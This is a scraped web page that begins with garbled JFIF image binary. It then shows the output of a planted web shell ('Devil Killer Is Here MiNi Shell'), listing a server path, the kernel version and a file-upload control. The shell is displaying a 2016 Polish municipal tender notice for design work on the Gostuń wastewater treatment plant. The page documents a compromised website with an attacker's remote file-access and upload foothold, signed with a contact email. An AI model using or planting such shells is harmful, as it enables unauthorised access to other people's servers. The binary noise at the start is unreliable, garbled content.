JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160323/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160323/66398-N-2016.html

<p class="kh_header"><b>Ostrowite: Opracowanie   dokumentacji projektowej  na   modernizację 
oczyszczalni   ścieków w  miejscowości Gostuń</b><br>
<b>Numer ogłoszenia: 66398 - 2016; data zamieszczenia: 23.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Ostrowite , ul. Lipowa 2, 62-402 Ostrowite, woj. wielkopolskie, tel. 063 2765121, faks 063 2765160.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ostrowite.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie   dokumentacji projektowej  na   modernizację 
oczyszczalni   ścieków w  miejscowości Gostuń.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Wykonawca  zobowiązuje się   do wykonania: Opracowania   dokumentacji projektowej na   modernizację oczyszczalni ścieków w miejscowości Gostuń. 
2. Zakres opracowania obejmować  będzie następujące obiekty i  roboty budowlane:							
1)Budynek mechanicznego  oczyszczania ścieków:	
- Instalacja sito - piaskownika,						.	
	- Wymiana istniejącej wentylacji grawitacyjnej i mechanicznej,			
	- Wymiana uszkodzonego poszycia ścian budynku,
				
2) Przepompownia lokalna :
- Roboty budowlane ,								
	- Dostawa i montaż urządzeń,	
		 					
3)Zbiornik retencyjno-uśredniający ścieków surowych (ZRU) wraz 	
       z komorą zasuw KZ2 :
	- Roboty budowlane ,									       
             - Dostawa i montaż urządzeń,							

4)Reaktor sekwencyjny SBR (SBR 1 i SBR 2) :
- Dostawa i montaż turbin napowietrzających,	
- Wymiana obudowy turbin napowietrzających  (t.j. osłon otworu technologicznego 
   zbiornika SBR),				
             - Wymiana wentylacji mechanicznej,						
	- Wymiana rurociągów,		
5)Instalacja chemicznego strącania fosforu (PIX) :
- Dostawa i montaż, 								

6)  Zbiornik magazynowy osadu (ZMO) 
- Wymiana mocowania spustu cieczy nadosadowej				
7) Budynek odwadniania osadu i higienizacji osadu 
- Stacja odwadniania osadu (SO),						 
	- Układ higienizacji osadu (HO)							
8) Składowisko osadu odwodnionego (SOO) :	
- Roboty budowlane 	
              -Dostawa  i montaż urządzeń,								
             - Budowa punktu przyjmowania osadów z przydomowych  oczyszczalni ścieków ,  (przewidzieć  przyjęcie osadów z wpięciem do technologii  przeróbki  osadów  ścieków,  sporządzenie projektu       budowlanego), 
 9) Zagospodarowanie  terenu  wokół  oczyszczalni ścieków( drogi, chodniki)


2. Ogólny zakres opracowania   i podstawowe  warunki wykonania: 
1) Uzyskanie aktualnej mapy do celów projektowych. 
2) Uzyskanie warunków i uzgodnień do projektowania od inwestora. 
Zadaniem  Wykonawcy jest  uzgodnić   z Inwestorem  rozwiązania   projektowe i materiałowe,
 zastosować  dobór  urządzeń   zgodnie z  technologią  oraz  parametrami wskazanymi w koncepcji technologicznej przebudowy  oczyszczalni ścieków  opracowanej przez dr inż. Mirosława Mąkowskiego..
3) Wykonanie  przedmiotu  Umowy  zgodnie  z  przepisami  ustawy z dnia 7 lipca 1994 r.  Prawo budowlane ( tekst jednolity Dz. U.2013 poz. 1409 ze zm.), z Rozporządzeniem Ministra Infrastruktury z dnia 02.09.2004 roku w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz.U.2013.1129 j.t.) , z wymogami Rozporządzenia Ministra Środowiska z dnia  18 listopada 2014r.  w sprawie  warunków , jakie należy   spełnić   przy wprowadzaniu ścieków do wód lub  do ziemi, oraz w sprawie  substancji  szczególnie   szkodliwych  dla środowiska wodnego (Dz.U. z 2014 r. poz. 1800) oraz  zgodne z zapisami koncepcji  Przebudowa  oczyszczalni ścieków w miejscowości Gostuń Gm.  Ostrowite oraz przepisami odrębnymi , jak  również  z zasadami wiedzy technicznej oraz obowiązującymi normami mi normatywami, ponadto zgodnie z przepisami ustawy z  dnia 29 stycznia 2004 r. Prawo zamówień publicznych ( Dz.U  z 2015 r. poz. 2164 , art.29-33 ) 
4) Wykonanie Projektu budowlanego  z uzgodnieniami z prawem do bezterminowego ich wykorzystania oraz     możliwością wprowadzenia nieistotnych zmian i realizacji projektu ze zmianami. 
4) Uzyskanie  kompletu uzgodnień branżowych , za  które   Wykonawca ponosi koszty wszystkich niezbędnych uzgodnień, opinii, decyzji oraz wykonania map, wypisów i   wyrysu z ewidencji gruntów.
5)Wykonanie    Projektów  wykonawczych , uzupełniających i uszczegóławiających projekt budowlany w zakresie i stopniu dokładności niezbędnym do sporządzenia przedmiaru robót, kosztorysu inwestorskiego oraz realizacji robót budowlanych
5) Opracowanie Specyfikacji Technicznych Wykonania i Odbioru Robót (STWiOR). 
6) Opracowanie kosztorysów inwestorskich  i przedmiarów robót wykonane zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18.05.2004 roku w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno -użytkowym (Dz.U.2004.130.1389).
7) W dokumentacji projektowej zabrania się opisywania materiałów i urządzeń za pomocą znaków towarowych, patentów lub pochodzenia, chyba, że jest to uzasadnione specyfiką przedmiotu zamówienia i Wykonawca nie może opisać przedmiotu zamówienia za pomocą dostatecznie dokładnych określeń, a wskazaniu takiemu towarzyszy sformułowanie o parametrach wyższych lub równoważnych. W takim przypadku Wykonawca zobowiązany jest sporządzić szczegółowy opis, w jaki sposób równoważność może być weryfikowana przez Zamawiającego. 
8) Uzyskanie w imieniu Zamawiającego pozwolenia na budowę lub zgłoszenie robót, dla których pozwolenie nie jest wymagane.  
9)  Pełnienie nadzoru autorskiego na budowie  zgodnie   z art. 20 ust. 1 pkt.4) Ustawy  z  7 lipca 1994r Prawo budowlane( tekst jednolity Dz. U.2013 ,poz. 1409 ze zm.)., także  podczas   rozruchu  oczyszczalni ścieków . 

10)    Przedmiot  Umowy    musi  przewidzieć   ciągłą   pracę   oczyszczalni ścieków.

11) Wpięcie  oraz   aktualizacja istniejącego  systemu monitoringu GPRS oraz  rozbudowa o nowe  urządzenia i system antywłamaniowy.

12 ) Należy    uwzględnić  możliwość  wykonania    całego przedsięwzięcia etapami..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.22.00.00-6, 71.22.10.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 8.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagania dotyczące wadium 
1.  Zamawiający wymaga wniesienia wadium.
 2. Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 2000,00 zł.,    (słownie: dwa tysiące  złotych).
3. Wykonawca może wnieść wadium jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy, tj.:
1) pieniądzu,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo -
kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2014r. , poz. 1804 ze zm.).
4. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania
ofert.
5. Wadium w pieniądzu należy wnieść przelewem na rachunek bankowy Zamawiającego w Banku Spółdzielczym   w  Ostrowitem , numer konta: 52 8542-0001 1100 2365 0011 4463 z adnotacją: Wadium - nr sprawy: GK.271.1.2016.PN, Opracowanie   dokumentacji projektowej na modernizację oczyszczalni ścieków w miejscowości Gostuń.
UWAGA: Dokument wniesienia wadium należy załączyć  do oferty.
6. W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty
zostaje termin uznania kwoty na rachunku Zamawiającego.
7. W przypadku wniesienia wadium w formie innej niż pieniądz dokument potwierdzający wniesienie wadium należy  załączyć do oferty . 
8. Wadium wnosi się na okres zawiązania ofertą, tj. 30 dni od terminu składania ofert.
9. Wadium wniesione  w pieniądzu Zamawiający przechowuje  na  rachunku bankowym.
10. Okoliczności zwrotu  wadium, zatrzymania określają przepisy ustawy Pzp 
11. Niewniesienie wadium w terminie  spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy Pzp a jego  oferta  zostanie  uznana za odrzuconą na podstawie  art. 24 ust.4 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania uprawnień do wykonywania określonej działalności lub czynności, 
jeżeli przepisy prawa nakładają obowiązek 
Ocena  spełnienia warunków  udziału w postępowaniu  zostanie  dokonana  wg  formuły spełnia- nie spełnia , w  oparciu o  informacje  zawarte w  dokumentach i  oświadczeniach</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonał należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum 1 usługę polegającą  na   wykonaniu  dokumentacji  projektowych  budowy, przebudowy,  rozbudowy , modernizacji lub koncepcji  oczyszczalni  mechaniczno-biologicznej o przepustowości min.  300 m3/d i min. 2500 RLM - zał. nr 6 do SIWZ.Ocena  spełnienia warunków  udziału w postępowaniu  zostanie  dokonana  wg  formuły spełnia- nie spełnia , w  oparciu o  informacje  zawarte w  dokumentach i  oświadczeniach</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-Zamawiający  uzna  , iż Wykonawca spełnia  warunek, jeżeli wykonawca wykaże, że dysponuje osobą,  osobami  , które  będą   uczestniczyły w  wykonywaniu  niniejszego  zamówienia , jako  kluczowi specjaliści Wykonawcy oraz podać informacje na temat ich kwalifikacji zawodowych, wykształcenia i doświadczenia, niezbędnych do wykonania Zamówienia, a także zakres wykonywanych przez nich czynności oraz informacją o podstawie do dysponowania tymi osobami: 
Wykonawca wykaże osoby, które będą wykonywać przedmiot zamówienia w tym:
1 osobę posiadającą uprawnienia projektowe w specjalności:
 - uprawnienia do projektowania bez ograniczeń w specjalności architektonicznej
 - uprawnienia do projektowania bez ograniczeń w specjalności konstrukcyjno-budowlanej
-  uprawnienia do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,  wodociągowych i kanalizacyjnych 
- uprawnienia do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń odpowiadające wymaganiom określonym w ustawie z dnia 7 lipca 1994 r. Prawo budowlane( Dz.U.z 2013r. poz.1409 ze zm.) lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów. 
Zamawiający dla osób , o których mowa wyżej w zakresie posiadanych uprawnień dopuszcza odpowiadające im uprawnienia wydane obywatelom państw członkowskich Unii Europejskiej , Konfederacji Szwajcarskiej , państw członkowskich Europejskiego Porozumienia o Wolnym Handlu 
( EFTA ) z zastrzeżeniem art. 12 a ustawy z dnia 7 lipca 1994 r. Prawo budowlane ( Dz.U. z 2013 r. poz.1409 ze zm.). 


Ocena  spełnienia warunków  udziału w postępowaniu  zostanie  dokonana  wg  formuły spełnia- nie spełnia , w  oparciu o  informacje  zawarte w  dokumentach i  oświadczeniach</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje szczegółowego warunku w tym zakresie;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz  oferty przetargowej  , którego wzór stanowi  załącznik nr 1 do niniejszej SIWZ;
 2)  w przypadku Konsorcjum należy  dołączyć szczegółową   informacje  o wykonawcach stanowiących  Konsorcjum , , którego wzór stanowi  załącznik nr 2 do niniejszej SIWZ;
- jeśli dotyczy; składania oferty wspólnej należy złożyć jeden dokument 
3) Pełnomocnictwo  do reprezentowania wykonawcy  w postępowaniu albo do reprezentowania  wykonawcy w postępowaniu i do zawarcia umowy, jeżeli osoba reprezentująca wykonawcę  w postępowaniu o  udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentowania we właściwym  rejestrze;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin wykonania - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana  istotnych postanowień  niniejszej umowy może  nastąpić w następujących  przypadkach:  
1) Zmiana postanowień niniejszej umowy co do terminu wykonania zamówienia 
     dopuszczalna jest w przypadku : 
  a) wystąpienia okoliczności , których strony nie były w stanie przewidzieć , pomimo braku 
      zachowania należytej staranności ,
  b) zmian regulacji prawnych , wpływających na konieczność zmiany terminu ,  
  c) działań osób trzecich lub organów władzy publicznej, które spowodują przerwanie lub 
     czasowe zawieszenie realizacji zamówienia ,  
  d) w następstwie wykraczających poza terminy określone w kodeksie postępowania   
     administracyjnego , procedur administracyjnych oraz terminów formalno-prawnych  
     mających  wpływ na terminy realizacji zamówienia ,
   e) wstrzymania prac lub przerw w pracach powstałych z przyczyn leżących po stronie 
      Zamawiającego ;
 2) Zmiana postanowień niniejszej umowy co do wynagrodzenia dopuszczalna jest w       
     przypadku :
a)	ceny brutto za wykonanie przedmiotu umowy jedynie w przypadku zmiany urzędowej stawki podatku od towarów i usług.
b)	w sytuacji  zmiany  zakresu rzeczowego, o której mowa w pkt.3 lit. b.
   3) Zmiana postanowień umowy co do zakresu rzeczowego dopuszczalna jest w przypadku: 
     a) zmian regulacji prawnych  wpływających na konieczność zmiany zakresu rzeczowego , 
     b) konieczności zmiany zakresu rzeczowego w przypadku , gdy zmiana ta wynika z  okoliczności , których Zamawiający nie mógł przewidzieć   w chwili zawarcia umowy .</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ostrowite.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Ostrowite ul. Lipowa 2, 62-402 Ostrowite pokój  pokój nr 14  u. Pani Ireny Kołata - inspektora ds  inwestycji, budownictwa i zamówień publicznych..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.04.2016 godzina 12:00, miejsce: Urząd Gminy Ostrowite ul. Lipowa 2, 62-402 Ostrowite sekretariat pokój nr 19.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com